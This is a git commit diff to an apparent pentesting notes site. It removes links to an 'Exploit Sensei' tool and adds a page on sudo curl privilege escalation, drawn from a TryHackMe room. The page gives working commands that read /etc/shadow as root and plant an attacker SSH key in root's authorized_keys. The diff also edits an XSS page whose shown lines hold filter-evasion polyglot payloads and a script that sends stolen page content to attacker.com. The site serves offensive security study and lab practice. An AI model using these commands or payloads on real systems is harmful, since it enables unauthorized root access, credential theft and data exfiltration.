updated

hdks-bug · hdks-bug · commit 9610adbbdd0c · 2025-03-25T22:19:00.000+09:00
diff --git a/src/_components/footer.vto b/src/_components/footer.vto
@@ -46,14 +46,6 @@
                 >
                     {{ site.lolgen.name }}
                 </a>
-                <a
-                    href="{{ site.exploit_sensei.url }}"
-                    target="_blank"
-                    rel="noopener noreferrer"
-                    class="hover:brightness-200"
-                >
-                    {{ site.exploit_sensei.name }}
-                </a>
             </div>
         </div>
         {{# /OTHER TOOLS #}}
diff --git a/src/_components/header.vto b/src/_components/header.vto
@@ -77,13 +77,6 @@
                     >
                         {{ site.lolgen.name }}
                     </a>
-                    <a
-                        href="{{ site.exploit_sensei.url }}"
-                        target="_blank"
-                        rel="noopener noreferrer"
-                    >
-                        {{ site.exploit_sensei.name }}
-                    </a>
                 </div>
             </div>
             <a
diff --git a/src/_components/navigation.vto b/src/_components/navigation.vto
@@ -78,14 +78,6 @@
                 >
                     {{ site.lolgen.name }}
                 </a>
-                <a
-                    href="{{ site.exploit_sensei.url }}"
-                    target="_blank"
-                    rel="noopener noreferrer"
-                    class="text-lg"
-                >
-                    {{ site.exploit_sensei.name }}
-                </a>
             </div>
         </div>
     </div>
diff --git a/src/_data/site.yml b/src/_data/site.yml
@@ -25,7 +25,3 @@ lolgen:
   name: LOLGEN
   url: https://lolgen.hdks.org/
   desc: Living Off The Land Payload Generator.
-exploit_sensei:
-  name: Exploit Sensei
-  url: https://github.com/hideckies/exploit-sensei
-  desc: LLM-powered Exploitation Recommendation Tool.
diff --git a/src/exploit/linux/privilege-escalation/sudo/sudo-curl-privilege-escalation.md b/src/exploit/linux/privilege-escalation/sudo/sudo-curl-privilege-escalation.md
@@ -0,0 +1,63 @@
+---
+title: Sudo Curl Privilege Escalation
+description: Sudo curl command might be vulnerable to privilege escalation (PrivEsc).
+tags:
+    - Privilege Escalation
+refs:
+date: 2025-03-25
+draft: false
+---
+
+## Investigation
+
+```bash
+sudo -l
+
+(root) /usr/bin/curl 127.0.0.1/*
+```
+
+If current user is allowed to execute the command above as root privilege, we can read arbitrary files in the target system or can add our SSH key in the root home directory by abusing the asterisk (`*`).  
+
+I found this setting on **Robots** room on TryHackMe.
+
+## Exploit
+
+### Option 1. Read Files
+
+```bash
+sudo /usr/bin/curl 127.0.0.1/ file:///etc/shadow
+```
+
+As above, we can read the content of the `/etc/shadow` as root.
+
+### Option 2. Add SSH Key
+
+We can also add our SSH public key to `/root/.ssh/authorized_keys`.  
+First, generate SSH keys in our local machine:
+
+```bash
+ssh-keygen -f key
+
+# Display the content of the public key, and copy it.
+cat key.pub
+```
+
+Next, in target machine, write the content of this public key:
+
+```bash
+echo -n '<content_of_public_key>' > /tmp/key.pub
+```
+
+Now, we can write this content to `/root/.ssh/authorized_keys` via `curl`:
+
+```bash
+sudo /usr/bin/curl 127.0.0.1/ -o /tmp/ignore file:///tmp/key.pub -o /root/.ssh/authorized_keys
+```
+
+By this, we can login SSH as root, using our private key:
+
+```bash
+# Run it our local machine
+chmod 600 key
+ssh root@<target-ip> -i key
+```
diff --git a/src/exploit/web/security-risk/xss.md b/src/exploit/web/security-risk/xss.md
@@ -11,7 +11,7 @@ refs:
     - https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
     - https://brutelogic.com.br/blog/building-xss-polyglots/
     - https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
-date: 2025-02-27
+date: 2025-03-25
 draft: false
 ---
 
@@ -42,8 +42,6 @@ draft: false
     python xsstrike.py -u http://vulnerable.com/comment --data '{"comment": "test"}' --json
     ```
 
-<br />
-
 <div data-pagefind-ignore>
 
 ## Payloads
@@ -169,8 +167,6 @@ jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</
 ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
 ```
 
-<br />
-
 ## Exploit
 
 After finding the XSS vulnerability, we can abuse it with 
@@ -257,7 +253,6 @@ If JavaScript code can be executed via XSS, we can let victims to get contents o
 
 ```html
 <script>
-window.onload = function() {
     fetch("/secret")
         .then(resp => resp.text())
         .then(text => {
@@ -266,7 +261,6 @@ window.onload = function() {
         .catch(err => {
             fetch(`http://attacker.com/?err=${err}`);
         });
-}
 </script>
 ```
 
